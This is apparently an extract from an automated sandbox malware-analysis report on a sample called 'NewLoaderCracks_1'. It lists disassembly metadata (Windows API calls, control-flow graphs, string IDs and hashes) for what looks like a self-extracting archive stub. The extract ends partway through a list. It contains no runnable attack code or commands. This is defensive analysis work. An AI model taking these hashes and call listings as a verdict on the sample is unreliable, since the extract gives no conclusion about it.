                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll
                • API String ID: 3498096277-3360196438
                • Opcode ID: 6b96e99fecd9bfabdc16f41b47f03c4c65a08bea8e53875adab71c21d01ce843
                • Instruction ID: 4d314500f595d7f62bcabb29dc0a1eaca15f7b1ff9ecbca37071e0208e40faae
                • Opcode Fuzzy Hash: 6b96e99fecd9bfabdc16f41b47f03c4c65a08bea8e53875adab71c21d01ce843
                • Instruction Fuzzy Hash: 77F0E7B190020AABCB10AF99984A9AFFFFCFF95705F00415AE814A2251DBB456099FA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1012 55d287-55d2bb call 55e360 SetEnvironmentVariableW call 54fbd8 1017 55d2bd-55d2c1 1012->1017 1018 55d2df-55d2e3 1012->1018 1019 55d2ca-55d2d1 call 54fcf1 1017->1019 1022 55d2c3-55d2c9 1019->1022 1023 55d2d3-55d2d9 SetEnvironmentVariableW 1019->1023 1022->1019 1023->1018
                APIs
                • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0055D29D
                • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0055D2D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: 6a335a68b09de62fd92e07c9970609964469315e21d7ca5104997c43b626c366
                • Instruction ID: 85003c59b0508d267d0d747781a58a47883c26572472f959cf3f0ad9c2d8755d
                • Opcode Fuzzy Hash: 6a335a68b09de62fd92e07c9970609964469315e21d7ca5104997c43b626c366
                • Instruction Fuzzy Hash: F0F08C72800228A6CB202F95AC1EAEA7F68FF19B52B004452FC88A6151E660CD84F7F1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1024 54984e-54985a 1025 549867-54987e ReadFile 1024->1025 1026 54985c-549864 GetStdHandle 1024->1026 1027 549880-549889 call 549989 1025->1027 1028 5498da 1025->1028 1026->1025 1032 5498a2-5498a6 1027->1032 1033 54988b-549893 1027->1033 1030 5498dd-5498e2 1028->1030 1035 5498b7-5498bb 1032->1035 1036 5498a8-5498b1 GetLastError 1032->1036 1033->1032 1034 549895 1033->1034 1039 549896-5498a0 call 54984e 1034->1039 1037 5498d5-5498d8 1035->1037 1038 5498bd-5498c5 1035->1038 1036->1035 1040 5498b3-5498b5 1036->1040 1037->1030 1038->1037 1041 5498c7-5498d0 GetLastError 1038->1041 1039->1030 1040->1030 1041->1037 1043 5498d2-5498d3 1041->1043 1043->1039
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 0054985E
                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00549876
                • GetLastError.KERNEL32 ref: 005498A8
                • GetLastError.KERNEL32 ref: 005498C7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 1d53973138a5a4dc715d47f79d3fd2b96737a710395618fdd3a24f80d3ad6c0b
                • Instruction ID: 7bb8f84bf745e92587a1e56a81ddc0cf614e7f9b922b3b73d46dc8d41c4b502f
                • Opcode Fuzzy Hash: 1d53973138a5a4dc715d47f79d3fd2b96737a710395618fdd3a24f80d3ad6c0b
                • Instruction Fuzzy Hash: FE11E530900204EFDB205B59D80AAFB3FA8FB93738F10C62AF42A85580D735DE44AF52
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0054CFE0,00000000,00000000,?,0056A49B,0054CFE0,00000000,00000000,00000000,?,0056A698,00000006,FlsSetValue), ref: 0056A526
                • GetLastError.KERNEL32(?,0056A49B,0054CFE0,00000000,00000000,00000000,?,0056A698,00000006,FlsSetValue,00577348,00577350,00000000,00000364,?,00569077), ref: 0056A532
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0056A49B,0054CFE0,00000000,00000000,00000000,?,0056A698,00000006,FlsSetValue,00577348,00577350,00000000), ref: 0056A540
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 2691d0e98538c14dcd34007e73c0efe3b9ef5baa3f1a566d415793f14c7034a1
                • Instruction ID: b45c04725d097eff75c8bf2b0dbc5b7f816dcd51e5e07c544f0b5416234df460
                • Opcode Fuzzy Hash: 2691d0e98538c14dcd34007e73c0efe3b9ef5baa3f1a566d415793f14c7034a1
                • Instruction Fuzzy Hash: 7D01F732651222ABCF21CA78EC44A567F98FF75BB1B100620F90BE3140D721D944EEE1
                APIs
                  • Part of subcall function 00568FA5: GetLastError.KERNEL32(?,00580EE8,00563E14,00580EE8,?,?,00563713,00000050,?,00580EE8,00000200), ref: 00568FA9
                  • Part of subcall function 00568FA5: _free.LIBCMT ref: 00568FDC
                  • Part of subcall function 00568FA5: SetLastError.KERNEL32(00000000,?,00580EE8,00000200), ref: 0056901D
                  • Part of subcall function 00568FA5: _abort.LIBCMT ref: 00569023
                  • Part of subcall function 0056B2AE: _abort.LIBCMT ref: 0056B2E0
                  • Part of subcall function 0056B2AE: _free.LIBCMT ref: 0056B314
                  • Part of subcall function 0056AF1B: GetOEMCP.KERNEL32(00000000,?,?,0056B1A5,?), ref: 0056AF46
                • _free.LIBCMT ref: 0056B200
                • _free.LIBCMT ref: 0056B236
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID: W
                • API String ID: 2991157371-3818464504
                • Opcode ID: 4ead16df8a067d04fe16d127570037f02922470aa0125bfbbaff2e71f58c4dc6
                • Instruction ID: 91e436f8bce7ab34f0dafe61752ecebbefc347d2395551fa9ad9acdf2e47dd46
                • Opcode Fuzzy Hash: 4ead16df8a067d04fe16d127570037f02922470aa0125bfbbaff2e71f58c4dc6
                • Instruction Fuzzy Hash: 85310231900209AFEB10EFA8D855AADBFF4FF85320F244199E8189B291EB719D81DB50
                APIs
                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0054CC94,00000001,?,?,?,00000000,00554ECD,?,?,?), ref: 00549F4C
                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00554ECD,?,?,?,?,?,00554972,?), ref: 00549F8E
                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0054CC94,00000001,?,?), ref: 00549FB8
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: 4af996322b8eb3118f3c3c83d3acfc744461f6838f82384c0e3819d374aa060d
                • Instruction ID: 8b45f74a5d6585ffdae75f21a6cbdda718b69a20b987e5d8377a83ae3d0018e7
                • Opcode Fuzzy Hash: 4af996322b8eb3118f3c3c83d3acfc744461f6838f82384c0e3819d374aa060d
                • Instruction Fuzzy Hash: EA310471208305ABDF118F24D8497ABBFA8FB91728F044558F9499B182C770D84CDBA2
                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0054A113,?,00000001,00000000,?,?), ref: 0054A22E
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0054A113,?,00000001,00000000,?,?), ref: 0054A261
                • GetLastError.KERNEL32(?,?,?,?,0054A113,?,00000001,00000000,?,?), ref: 0054A27E
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CreateDirectory$ErrorLast
                • String ID:
                • API String ID: 2485089472-0
                • Opcode ID: 6585925f7fce0f746bbce452c1061d53ac92137f282394a8cbe00071b14a5abe
                • Instruction ID: c2aaa48237c1c4716bead3f91acc9ff36591ff507a588989b2b76053ec95b071
                • Opcode Fuzzy Hash: 6585925f7fce0f746bbce452c1061d53ac92137f282394a8cbe00071b14a5abe
                • Instruction Fuzzy Hash: 3401D2392C821566EBB29B745C09BEE7B4CBF16749F040851F844D6051D7E2CA80F6B3
                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0056B019
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: f56e8d0f5f7e760863c1b3993b0c1dcb37ef6594f80d1186515bde2451a6961c
                • Instruction ID: 5d2250ae53815f452cb7e6a4a1c6b2ed630dc20463862d6bb8af42d3c0640fc1
                • Opcode Fuzzy Hash: f56e8d0f5f7e760863c1b3993b0c1dcb37ef6594f80d1186515bde2451a6961c
                • Instruction Fuzzy Hash: 6641F77050434CAAEB228E24CC99AF6BFA9FB46304F1404EDE59AC7142E3359A85DF20
                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0056A79D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: 3432a9ab57a0ff0cf267233e74ed6673e46ce66beeb326c4dff66e8689c6a331
                • Instruction ID: 264bcecac12b82db8255c622b44326fd8c3d926445874c8cab0196ee6bf9cdf6
                • Opcode Fuzzy Hash: 3432a9ab57a0ff0cf267233e74ed6673e46ce66beeb326c4dff66e8689c6a331
                • Instruction Fuzzy Hash: 8C01D33254420DBBCF025FA0EC06DAE7F66FF5C760F048554FE1826161CA729A71BB92
                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00569D2F), ref: 0056A715
                Strings
                • InitializeCriticalSectionEx, xrefs: 0056A6E5
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: cb560a21843b5a28b199c55b8f0aeb5596f88a2fb550daacda3ca25ab39b6e36
                • Instruction ID: 4dd9a8c8124a7f7a93143e4375cdcc82d111d0fcdad28a158a8a1b902576f3ff
                • Opcode Fuzzy Hash: cb560a21843b5a28b199c55b8f0aeb5596f88a2fb550daacda3ca25ab39b6e36
                • Instruction Fuzzy Hash: 2DF0BE3164521CBBCF016F60EC0ACAE7F61FF58B21B408464FC0D6A261DA719E50FB91
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: 77fa2f127ee8e8e347ac6de806c0fd391d5f8506b8ffc6c50664aaa79784af8c
                • Instruction ID: 8cd1a656eb0b44b96efd36ad2e16bbee05f34c881781216c6d1c2e664535bee5
                • Opcode Fuzzy Hash: 77fa2f127ee8e8e347ac6de806c0fd391d5f8506b8ffc6c50664aaa79784af8c
                • Instruction Fuzzy Hash: 90E05C3074522CABC710AF54BC0686DBF50FB79721B404055FC0D27240DD704E00B6D6
                APIs
                • try_get_function.LIBVCRUNTIME ref: 005632AF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: try_get_function
                • String ID: FlsAlloc
                • API String ID: 2742660187-671089009
                • Opcode ID: b33f769a797503feeb0584eae349b9d8834ff3767c24a58661f931ee5c35854d
                • Instruction ID: bb4560ce5af1554c6b189021edd663e5c28b9cdbfe9a16e63762e5449166f590
                • Opcode Fuzzy Hash: b33f769a797503feeb0584eae349b9d8834ff3767c24a58661f931ee5c35854d
                • Instruction Fuzzy Hash: ABD02B31B80B356A821032C07C039AE7E04A701FB2F454152FE0C1B142A4E19A40B1C5
                APIs
                  • Part of subcall function 0056AF1B: GetOEMCP.KERNEL32(00000000,?,?,0056B1A5,?), ref: 0056AF46
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0056B1EA,?,00000000), ref: 0056B3C4
                • GetCPInfo.KERNEL32(00000000,0056B1EA,?,?,?,0056B1EA,?,00000000), ref: 0056B3D7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: 27e2127cf02f9ba5180fa4a56f7b120d0919a669628f7ee513b0cfe831557039
                • Instruction ID: fb05693225e36062b5d9977d4892fe421d2a36b298e2001abf4452dccb321a98
                • Opcode Fuzzy Hash: 27e2127cf02f9ba5180fa4a56f7b120d0919a669628f7ee513b0cfe831557039
                • Instruction Fuzzy Hash: 53515870A003069EEF208F31C8856BABFE6FF55311F1844AED086CB253EB359985DB81
                APIs
                • __EH_prolog.LIBCMT ref: 00541385
                  • Part of subcall function 00546057: __EH_prolog.LIBCMT ref: 0054605C
                  • Part of subcall function 0054C827: __EH_prolog.LIBCMT ref: 0054C82C
                  • Part of subcall function 0054C827: new.LIBCMT ref: 0054C86F
                  • Part of subcall function 0054C827: new.LIBCMT ref: 0054C893
                • new.LIBCMT ref: 005413FE
                  • Part of subcall function 0054B07D: __EH_prolog.LIBCMT ref: 0054B082
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: b79d42dc901eac9389cbd45f573e6f0c53051df0deddfa8b6ab63d5a96e80cd6
                • Instruction ID: e4aadf471611631bb0bfd730c92c443b7e5622b4c8bced18ca17badd6be48e55
                • Opcode Fuzzy Hash: b79d42dc901eac9389cbd45f573e6f0c53051df0deddfa8b6ab63d5a96e80cd6
                • Instruction Fuzzy Hash: 124144B0805B419EE724DF7984899E7FFE5FB18304F404A2ED6EE83282DB326558CB15
                APIs
                • __EH_prolog.LIBCMT ref: 00541385
                  • Part of subcall function 00546057: __EH_prolog.LIBCMT ref: 0054605C
                  • Part of subcall function 0054C827: __EH_prolog.LIBCMT ref: 0054C82C
                  • Part of subcall function 0054C827: new.LIBCMT ref: 0054C86F
                  • Part of subcall function 0054C827: new.LIBCMT ref: 0054C893
                • new.LIBCMT ref: 005413FE
                  • Part of subcall function 0054B07D: __EH_prolog.LIBCMT ref: 0054B082
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 98fc883ffdd068de80f7791189c8c3b0180d997c7edbfe3c2d4a64d4ca2667e6
                • Instruction ID: 2b3f93af92a7f4e91aa6058bcfdf63841504ab7f748c840067efffc09a57d4ac
                • Opcode Fuzzy Hash: 98fc883ffdd068de80f7791189c8c3b0180d997c7edbfe3c2d4a64d4ca2667e6
                • Instruction Fuzzy Hash: A94132B0805B419EE724DF79848AAE7FFE5FB18304F404A6ED5EE83282DB326554CB15
                APIs
                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00549EDC,?,?,00547867), ref: 005497A6
                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00549EDC,?,?,00547867), ref: 005497DB
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
